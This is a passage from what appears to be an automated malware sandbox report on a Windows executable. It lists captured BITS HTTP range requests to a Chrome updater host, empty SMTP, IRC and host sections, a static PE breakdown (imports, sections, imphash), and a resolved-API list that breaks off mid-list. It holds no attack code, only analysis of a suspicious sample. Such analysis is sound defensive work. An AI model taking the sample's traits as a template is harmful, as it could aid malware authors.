  705.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  706.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=16973480-18438938\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  707.         "port": 80
  708.     },
  709.     {
  710.         "count": 1,
  711.         "body": "",
  712.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  713.         "user-agent": "Microsoft BITS/7.5",
  714.         "method": "GET",
  715.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  716.         "version": "1.1",
  717.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  718.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=18438939-19888021\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  719.         "port": 80
  720.     },
  721.     {
  722.         "count": 1,
  723.         "body": "",
  724.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  725.         "user-agent": "Microsoft BITS/7.5",
  726.         "method": "GET",
  727.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  728.         "version": "1.1",
  729.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  730.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=19888022-20811638\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  731.         "port": 80
  732.     },
  733.     {
  734.         "count": 1,
  735.         "body": "",
  736.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  737.         "user-agent": "Microsoft BITS/7.5",
  738.         "method": "GET",
  739.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  740.         "version": "1.1",
  741.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  742.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=20811639-22252440\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  743.         "port": 80
  744.     },
  745.     {
  746.         "count": 1,
  747.         "body": "",
  748.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  749.         "user-agent": "Microsoft BITS/7.5",
  750.         "method": "GET",
  751.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  752.         "version": "1.1",
  753.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  754.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=22252441-23705723\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  755.         "port": 80
  756.     },
  757.     {
  758.         "count": 1,
  759.         "body": "",
  760.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  761.         "user-agent": "Microsoft BITS/7.5",
  762.         "method": "GET",
  763.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  764.         "version": "1.1",
  765.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  766.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=23705724-25236904\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  767.         "port": 80
  768.     },
  769.     {
  770.         "count": 1,
  771.         "body": "",
  772.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  773.         "user-agent": "Microsoft BITS/7.5",
  774.         "method": "GET",
  775.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  776.         "version": "1.1",
  777.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  778.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=25236905-26834675\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  779.         "port": 80
  780.     },
  781.     {
  782.         "count": 1,
  783.         "body": "",
  784.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  785.         "user-agent": "Microsoft BITS/7.5",
  786.         "method": "GET",
  787.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  788.         "version": "1.1",
  789.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  790.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=26834676-27861757\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  791.         "port": 80
  792.     },
  793.     {
  794.         "count": 1,
  795.         "body": "",
  796.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  797.         "user-agent": "Microsoft BITS/7.5",
  798.         "method": "GET",
  799.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  800.         "version": "1.1",
  801.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  802.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=27861758-29675521\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  803.         "port": 80
  804.     },
  805.     {
  806.         "count": 1,
  807.         "body": "",
  808.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  809.         "user-agent": "Microsoft BITS/7.5",
  810.         "method": "GET",
  811.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  812.         "version": "1.1",
  813.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  814.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=29675522-30336767\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  815.         "port": 80
  816.     }
  817. ]
  818.  
  819. [*] Network Communication - SMTP: []
  820.  
  821. [*] Network Communication - Hosts: []
  822.  
  823. [*] Network Communication - IRC: []
  824.  
  825. [*] Static Analysis: {
  826.     "pe": {
  827.         "peid_signatures": null,
  828.         "imports": [
  829.             {
  830.                 "imports": [
  831.                     {
  832.                         "name": "VirtualAllocEx",
  833.                         "address": "0x41d00c"
  834.                     },
  835.                     {
  836.                         "name": "GetCommandLineW",
  837.                         "address": "0x41d010"
  838.                     },
  839.                     {
  840.                         "name": "GetOEMCP",
  841.                         "address": "0x41d014"
  842.                     },
  843.                     {
  844.                         "name": "GetCommandLineA",
  845.                         "address": "0x41d018"
  846.                     },
  847.                     {
  848.                         "name": "GetProcAddress",
  849.                         "address": "0x41d01c"
  850.                     },
  851.                     {
  852.                         "name": "LoadLibraryA",
  853.                         "address": "0x41d020"
  854.                     },
  855.                     {
  856.                         "name": "GetLastError",
  857.                         "address": "0x41d024"
  858.                     },
  859.                     {
  860.                         "name": "GetModuleHandleA",
  861.                         "address": "0x41d028"
  862.                     },
  863.                     {
  864.                         "name": "GetCurrentProcess",
  865.                         "address": "0x41d02c"
  866.                     },
  867.                     {
  868.                         "name": "GetProcessHeap",
  869.                         "address": "0x41d030"
  870.                     },
  871.                     {
  872.                         "name": "InterlockedIncrement",
  873.                         "address": "0x41d034"
  874.                     },
  875.                     {
  876.                         "name": "lstrlenA",
  877.                         "address": "0x41d038"
  878.                     },
  879.                     {
  880.                         "name": "GetVersionExA",
  881.                         "address": "0x41d03c"
  882.                     },
  883.                     {
  884.                         "name": "GetVersionExW",
  885.                         "address": "0x41d040"
  886.                     },
  887.                     {
  888.                         "name": "InterlockedDecrement",
  889.                         "address": "0x41d044"
  890.                     },
  891.                     {
  892.                         "name": "GetCurrentThread",
  893.                         "address": "0x41d048"
  894.                     },
  895.                     {
  896.                         "name": "GetTickCount",
  897.                         "address": "0x41d04c"
  898.                     },
  899.                     {
  900.                         "name": "GetStartupInfoW",
  901.                         "address": "0x41d050"
  902.                     }
  903.                 ],
  904.                 "dll": "KERNEL32.dll"
  905.             },
  906.             {
  907.                 "imports": [
  908.                     {
  909.                         "name": "DestroyWindow",
  910.                         "address": "0x41d058"
  911.                     },
  912.                     {
  913.                         "name": "RegisterClassW",
  914.                         "address": "0x41d05c"
  915.                     },
  916.                     {
  917.                         "name": "LoadIconA",
  918.                         "address": "0x41d060"
  919.                     },
  920.                     {
  921.                         "name": "SetWindowLongW",
  922.                         "address": "0x41d064"
  923.                     },
  924.                     {
  925.                         "name": "SetWindowTextW",
  926.                         "address": "0x41d068"
  927.                     },
  928.                     {
  929.                         "name": "DefWindowProcW",
  930.                         "address": "0x41d06c"
  931.                     },
  932.                     {
  933.                         "name": "CreateWindowExA",
  934.                         "address": "0x41d070"
  935.                     },
  936.                     {
  937.                         "name": "DestroyIcon",
  938.                         "address": "0x41d074"
  939.                     },
  940.                     {
  941.                         "name": "SendMessageW",
  942.                         "address": "0x41d078"
  943.                     },
  944.                     {
  945.                         "name": "CreateWindowExW",
  946.                         "address": "0x41d07c"
  947.                     },
  948.                     {
  949.                         "name": "UnregisterClassA",
  950.                         "address": "0x41d080"
  951.                     },
  952.                     {
  953.                         "name": "LoadStringW",
  954.                         "address": "0x41d084"
  955.                     },
  956.                     {
  957.                         "name": "PostMessageW",
  958.                         "address": "0x41d088"
  959.                     }
  960.                 ],
  961.                 "dll": "USER32.dll"
  962.             },
  963.             {
  964.                 "imports": [
  965.                     {
  966.                         "name": "CreateDIBSection",
  967.                         "address": "0x41d000"
  968.                     },
  969.                     {
  970.                         "name": "CreateBitmap",
  971.                         "address": "0x41d004"
  972.                     }
  973.                 ],
  974.                 "dll": "GDI32.dll"
  975.             },
  976.             {
  977.                 "imports": [
  978.                     {
  979.                         "name": "CoInitialize",
  980.                         "address": "0x41d0d8"
  981.                     },
  982.                     {
  983.                         "name": "CoGetObject",
  984.                         "address": "0x41d0dc"
  985.                     }
  986.                 ],
  987.                 "dll": "ole32.dll"
  988.             },
  989.             {
  990.                 "imports": [
  991.                     {
  992.                         "name": "__setusermatherr",
  993.                         "address": "0x41d090"
  994.                     },
  995.                     {
  996.                         "name": "_c_exit",
  997.                         "address": "0x41d094"
  998.                     },
  999.                     {
  1000.                         "name": "_except_handler3",
  1001.                         "address": "0x41d098"
  1002.                     },
  1003.                     {
  1004.                         "name": "_XcptFilter",
  1005.                         "address": "0x41d09c"
  1006.                     },
  1007.                     {
  1008.                         "name": "_cexit",
  1009.                         "address": "0x41d0a0"
  1010.                     },
  1011.                     {
  1012.                         "name": "exit",
  1013.                         "address": "0x41d0a4"
  1014.                     },
  1015.                     {
  1016.                         "name": "_wcmdln",
  1017.                         "address": "0x41d0a8"
  1018.                     },
  1019.                     {
  1020.                         "name": "__wgetmainargs",
  1021.                         "address": "0x41d0ac"
  1022.                     },
  1023.                     {
  1024.                         "name": "_initterm",
  1025.                         "address": "0x41d0b0"
  1026.                     },
  1027.                     {
  1028.                         "name": "_exit",
  1029.                         "address": "0x41d0b4"
  1030.                     },
  1031.                     {
  1032.                         "name": "_adjust_fdiv",
  1033.                         "address": "0x41d0b8"
  1034.                     },
  1035.                     {
  1036.                         "name": "__p__commode",
  1037.                         "address": "0x41d0bc"
  1038.                     },
  1039.                     {
  1040.                         "name": "__p__fmode",
  1041.                         "address": "0x41d0c0"
  1042.                     },
  1043.                     {
  1044.                         "name": "__set_app_type",
  1045.                         "address": "0x41d0c4"
  1046.                     },
  1047.                     {
  1048.                         "name": "_controlfp",
  1049.                         "address": "0x41d0c8"
  1050.                     },
  1051.                     {
  1052.                         "name": "__dllonexit",
  1053.                         "address": "0x41d0cc"
  1054.                     },
  1055.                     {
  1056.                         "name": "_onexit",
  1057.                         "address": "0x41d0d0"
  1058.                     }
  1059.                 ],
  1060.                 "dll": "msvcrt.dll"
  1061.             }
  1062.         ],
  1063.         "digital_signers": null,
  1064.         "exported_dll_name": null,
  1065.         "actual_checksum": "0x0001d0b3",
  1066.         "overlay": {
  1067.             "size": "0x00001f08",
  1068.             "offset": "0x0000c000"
  1069.         },
  1070.         "imagebase": "0x00400000",
  1071.         "reported_checksum": "0x0001d0b3",
  1072.         "icon_hash": null,
  1073.         "entrypoint": "0x00404636",
  1074.         "timestamp": "2016-08-19 14:55:52",
  1075.         "osversion": "4.0",
  1076.         "sections": [
  1077.             {
  1078.                 "name": ".text",
  1079.                 "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1080.                 "virtual_address": "0x00001000",
  1081.                 "size_of_data": "0x00004000",
  1082.                 "entropy": "5.74",
  1083.                 "raw_address": "0x00001000",
  1084.                 "virtual_size": "0x00003916",
  1085.                 "characteristics_raw": "0xf0000020"
  1086.             },
  1087.             {
  1088.                 "name": ".bss",
  1089.                 "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1090.                 "virtual_address": "0x00005000",
  1091.                 "size_of_data": "0x00000000",
  1092.                 "entropy": "0.00",
  1093.                 "raw_address": "0x00000000",
  1094.                 "virtual_size": "0x00017030",
  1095.                 "characteristics_raw": "0xc0000080"
  1096.             },
  1097.             {
  1098.                 "name": ".rdata",
  1099.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1100.                 "virtual_address": "0x0001d000",
  1101.                 "size_of_data": "0x00001000",
  1102.                 "entropy": "2.45",
  1103.                 "raw_address": "0x00005000",
  1104.                 "virtual_size": "0x000005dc",
  1105.                 "characteristics_raw": "0x40000040"
  1106.             },
  1107.             {
  1108.                 "name": ".data",
  1109.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1110.                 "virtual_address": "0x0001e000",
  1111.                 "size_of_data": "0x00005000",
  1112.                 "entropy": "6.48",
  1113.                 "raw_address": "0x00006000",
  1114.                 "virtual_size": "0x00004ef4",
  1115.                 "characteristics_raw": "0xd0000040"
  1116.             },
  1117.             {
  1118.                 "name": ".reloc",
  1119.                 "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1120.                 "virtual_address": "0x00023000",
  1121.                 "size_of_data": "0x00001000",
  1122.                 "entropy": "0.70",
  1123.                 "raw_address": "0x0000b000",
  1124.                 "virtual_size": "0x0000024e",
  1125.                 "characteristics_raw": "0x42000040"
  1126.             }
  1127.         ],
  1128.         "resources": [],
  1129.         "dirents": [
  1130.             {
  1131.                 "virtual_address": "0x00000000",
  1132.                 "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1133.                 "size": "0x00000000"
  1134.             },
  1135.             {
  1136.                 "virtual_address": "0x0001d104",
  1137.                 "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1138.                 "size": "0x00000078"
  1139.             },
  1140.             {
  1141.                 "virtual_address": "0x00000000",
  1142.                 "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1143.                 "size": "0x00000000"
  1144.             },
  1145.             {
  1146.                 "virtual_address": "0x00000000",
  1147.                 "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1148.                 "size": "0x00000000"
  1149.             },
  1150.             {
  1151.                 "virtual_address": "0x0000c000",
  1152.                 "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1153.                 "size": "0x00001f08"
  1154.             },
  1155.             {
  1156.                 "virtual_address": "0x00023000",
  1157.                 "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1158.                 "size": "0x0000011c"
  1159.             },
  1160.             {
  1161.                 "virtual_address": "0x00000000",
  1162.                 "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1163.                 "size": "0x00000000"
  1164.             },
  1165.             {
  1166.                 "virtual_address": "0x00000000",
  1167.                 "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1168.                 "size": "0x00000000"
  1169.             },
  1170.             {
  1171.                 "virtual_address": "0x00000000",
  1172.                 "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1173.                 "size": "0x00000000"
  1174.             },
  1175.             {
  1176.                 "virtual_address": "0x00000000",
  1177.                 "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1178.                 "size": "0x00000000"
  1179.             },
  1180.             {
  1181.                 "virtual_address": "0x00000000",
  1182.                 "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1183.                 "size": "0x00000000"
  1184.             },
  1185.             {
  1186.                 "virtual_address": "0x00000000",
  1187.                 "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1188.                 "size": "0x00000000"
  1189.             },
  1190.             {
  1191.                 "virtual_address": "0x0001d000",
  1192.                 "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1193.                 "size": "0x000000e4"
  1194.             },
  1195.             {
  1196.                 "virtual_address": "0x00000000",
  1197.                 "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1198.                 "size": "0x00000000"
  1199.             },
  1200.             {
  1201.                 "virtual_address": "0x00000000",
  1202.                 "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1203.                 "size": "0x00000000"
  1204.             },
  1205.             {
  1206.                 "virtual_address": "0x00000000",
  1207.                 "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1208.                 "size": "0x00000000"
  1209.             }
  1210.         ],
  1211.         "exports": [],
  1212.         "guest_signers": {},
  1213.         "imphash": "ed3432959df410bdf8d52780a8c0d1d3",
  1214.         "icon_fuzzy": null,
  1215.         "icon": null,
  1216.         "pdbpath": null,
  1217.         "imported_dll_count": 5,
  1218.         "versioninfo": []
  1219.     }
  1220. }
  1221.  
  1222. [*] Resolved APIs: [
  1223.     "cryptbase.dll.SystemFunction036",
  1224.     "uxtheme.dll.ThemeInitApiHook",
  1225.     "user32.dll.IsProcessDPIAware",
  1226.     "user32.dll.GetWindowContextHelpId",
  1227.     "kernel32.dll.VirtualAlloc",
  1228.     "kernel32.dll.VirtualProtect",
  1229.     "kernel32.dll.LoadLibraryA",
  1230.     "kernel32.dll.VirtualFree",
  1231.     "kernel32.dll.VirtualQuery",
  1232.     "advapi32.dll.GetUserNameA",
  1233.     "kernel32.dll.AddAtomA",
  1234.     "kernel32.dll.CloseHandle",
  1235.     "kernel32.dll.CreateDirectoryA",
  1236.     "kernel32.dll.CreateFileA",
  1237.     "kernel32.dll.CreateProcessA",
  1238.     "kernel32.dll.ExitProcess",
  1239.     "kernel32.dll.FindAtomA",
  1240.     "kernel32.dll.FreeLibrary",
  1241.     "kernel32.dll.GetAtomNameA",
  1242.     "kernel32.dll.GetComputerNameA",
  1243.     "kernel32.dll.GetFileAttributesA",
  1244.     "kernel32.dll.GetFileSize",
  1245.     "kernel32.dll.GetModuleFileNameA",
  1246.     "kernel32.dll.GetModuleHandleA",
  1247.     "kernel32.dll.GetProcAddress",
  1248.     "kernel32.dll.GetSystemDirectoryA",
  1249.     "kernel32.dll.GetSystemInfo",
  1250.     "kernel32.dll.GetTempPathA",
  1251.     "kernel32.dll.GetVersionExA",
  1252.     "kernel32.dll.GetVolumeInformationA",
  1253.     "kernel32.dll.SetUnhandledExceptionFilter",
  1254.     "kernel32.dll.Sleep",
  1255.     "kernel32.dll.WaitForSingleObject",
  1256.     "kernel32.dll.WriteFile",
  1257.     "msvcrt.dll._itoa",
